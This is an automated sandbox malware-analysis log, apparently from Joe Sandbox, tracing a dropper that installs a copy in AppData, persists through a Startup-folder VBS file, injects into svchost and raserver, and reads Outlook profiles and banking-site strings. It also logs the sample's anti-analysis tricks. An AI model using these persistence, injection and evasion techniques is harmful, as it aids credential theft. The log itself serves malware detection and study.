                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: CjbMEPJZ3J.exeStatic file information: File size 1183232 > 1048576
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: CjbMEPJZ3J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: unnervously.exe, 00000002.00000003.1119418030.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000002.00000003.1120126579.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1145281265.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1143508760.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1252135632.0000000004698000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1254142856.0000000004844000.00000004.00000020.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1271723340.0000000003640000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1261684311.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1287602484.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1289748764.0000000003400000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: unnervously.exe, 00000002.00000003.1119418030.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000002.00000003.1120126579.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1252489735.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1145281265.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1143508760.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1252135632.0000000004698000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1254142856.0000000004844000.00000004.00000020.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1271723340.0000000003640000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1261684311.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1287602484.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1289748764.0000000003400000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RAServer.pdb source: svchost.exe, 00000003.00000003.1217812960.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1217716605.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544472131.000000000127E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdb source: raserver.exe, 00000005.00000002.3543702437.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545676916.000000000501C000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332887721.0000000002AAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1606462894.0000000004FBC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: RAServer.pdbGCTL source: svchost.exe, 00000003.00000003.1217812960.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1217716605.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544472131.000000000127E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdbUGP source: raserver.exe, 00000005.00000002.3543702437.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545676916.000000000501C000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332887721.0000000002AAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1606462894.0000000004FBC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1164546841.0000000000D1F000.00000002.00000001.01000000.00000005.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332548834.0000000000D1F000.00000002.00000001.01000000.00000005.sdmp
                    Source: CjbMEPJZ3J.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: CjbMEPJZ3J.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: CjbMEPJZ3J.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: CjbMEPJZ3J.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: CjbMEPJZ3J.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001AC304 LoadLibraryA,GetProcAddress,0_2_001AC304
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0013C590 push eax; retn 0013h0_2_0013C599
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00158B85 push ecx; ret 0_2_00158B98
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0001C590 push eax; retn 0001h2_2_0001C599
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00038B85 push ecx; ret 2_2_00038B98
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402064 push edx; ret 3_2_00402065
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004181EE push ebp; retf 3_2_00418233
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040827F push edx; iretd 3_2_00408280
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416A3D push esp; ret 3_2_00416A51
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408320 push 00000028h; iretd 3_2_00408327
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403330 push eax; ret 3_2_00403332
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A3DE push eax; iretd 3_2_0041A3E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004183F4 push eax; ret 3_2_004183FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00412566 push esi; ret 3_2_00412572
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00424503 push edx; iretd 3_2_00424543
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040853A push E5447EABh; retf 3_2_0040853F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417580 push FFFFFFD8h; iretd 3_2_0041758A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418738 push esp; retf 3_2_0041873A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411F90 push ecx; iretd 3_2_00411F91
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300225F pushad ; ret 3_2_030027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030027FA pushad ; ret 3_2_030027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030309AD push ecx; mov dword ptr [esp], ecx3_2_030309B6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300283D push eax; iretd 3_2_03002858
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0300135E push eax; iretd 3_2_03001369
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeFile created: C:\Users\user\AppData\Local\Melba\unnervously.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbsJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00134A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00134A35
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001B55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001B55FD
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00014A35
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_000955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000955FD
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001533C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001533C7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeAPI/Special instruction interceptor: Address: 11D626C
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeAPI/Special instruction interceptor: Address: CC8A9C
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D324
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D7E4
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D944
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D504
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D544
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122D1E4
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD31230154
                    Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFD3122DA44
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E rdtsc 3_2_0307096E
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 9735Jump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeAPI coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeAPI coverage: 5.0 %
                    Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 2080Thread sleep count: 238 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 2080Thread sleep time: -476000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 2080Thread sleep count: 9735 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 2080Thread sleep time: -19470000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe TID: 7268Thread sleep time: -95000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe TID: 7268Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe TID: 7268Thread sleep time: -51000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe TID: 7268Thread sleep count: 48 > 30Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe TID: 7268Thread sleep time: -48000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00194696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00194696
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019C93C FindFirstFileW,FindClose,0_2_0019C93C
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0019C9C7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019F200
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019F35D
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0019F65E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00193A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00193A2B
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00193D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00193D4E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0019BF27
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00074696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00074696
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007C93C FindFirstFileW,FindClose,2_2_0007C93C
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0007C9C7
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0007F200
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0007F35D
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0007F65E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00073A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00073A2B
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00073D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00073D4E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0007BF27
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00134AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00134AFE
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: 2RF331.5.drBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: 2RF331.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: 2RF331.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: 2RF331.5.drBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: 2RF331.5.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: 2RF331.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: raserver.exe, 00000005.00000002.3543702437.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 2RF331.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: 2RF331.5.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3543821738.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1607912931.000002AC84E8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: 2RF331.5.drBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: 2RF331.5.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: 2RF331.5.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: 2RF331.5.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: 2RF331.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: 2RF331.5.drBinary or memory string: global block list test formVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: 2RF331.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: 2RF331.5.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: 2RF331.5.drBinary or memory string: discord.comVMware20,11696501413f
                    Source: 2RF331.5.drBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeAPI call chain: ExitProcess graph end nodegraph_0-99372
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeAPI call chain: ExitProcess graph end nodegraph_0-98283
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E rdtsc 3_2_0307096E
